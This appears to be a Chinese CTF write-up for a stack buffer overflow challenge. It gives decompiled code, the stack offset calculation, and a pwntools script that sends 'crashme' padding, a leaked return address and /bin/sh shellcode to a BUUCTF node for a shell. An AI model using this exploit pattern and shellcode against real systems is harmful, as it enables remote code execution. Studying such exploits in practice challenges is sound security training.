逆向
int chall()
{
size_t v0; // eax
int result; // eax
char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
_BYTE *v3; // [esp+40Ch] [ebp-Ch]
printf("Yippie, lets crash: %p\n", s);
printf("Whats your name?\n");
printf("> ");
fgets(s, 1023, stdin);
v0 = strlen(s);
v3 = memchr(s, 10, v0);
if ( v3 )
*v3 = 0;
printf("\nWelcome %s!\n", s);
result = strcmp(s, "crashme");
if ( !result )
result = vuln((char)s, 0x400u);
return result;
}
void *__cdecl vuln(char src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF
return memcpy(dest, &src, n);
}
攻击思路
memcpy中将src中的数据拷贝到dest中,但dest的最大存储空间为50字节
-00000032 dest db 50 dup(?)
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008 src db 4 dup(?)
+0000000C n dd ?
偏移量为32字节,由于在执行vuln函数之前会判断s与"crashme",因此首部需输入"crashme\0x00",还需加入26-8字节=18字节
脚本攻击
from pwn import *
p=remote('node4.buuoj.cn',28099)
p.recvuntil(b'crash: ')
addr=int(p.recv(10),16) #转换地址进制
shellcode = b"\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"
payload=b"crashme\x00"+b"a"*18+p32(addr-0x1c)+shellcode
p.sendline(payload)
p.interactive()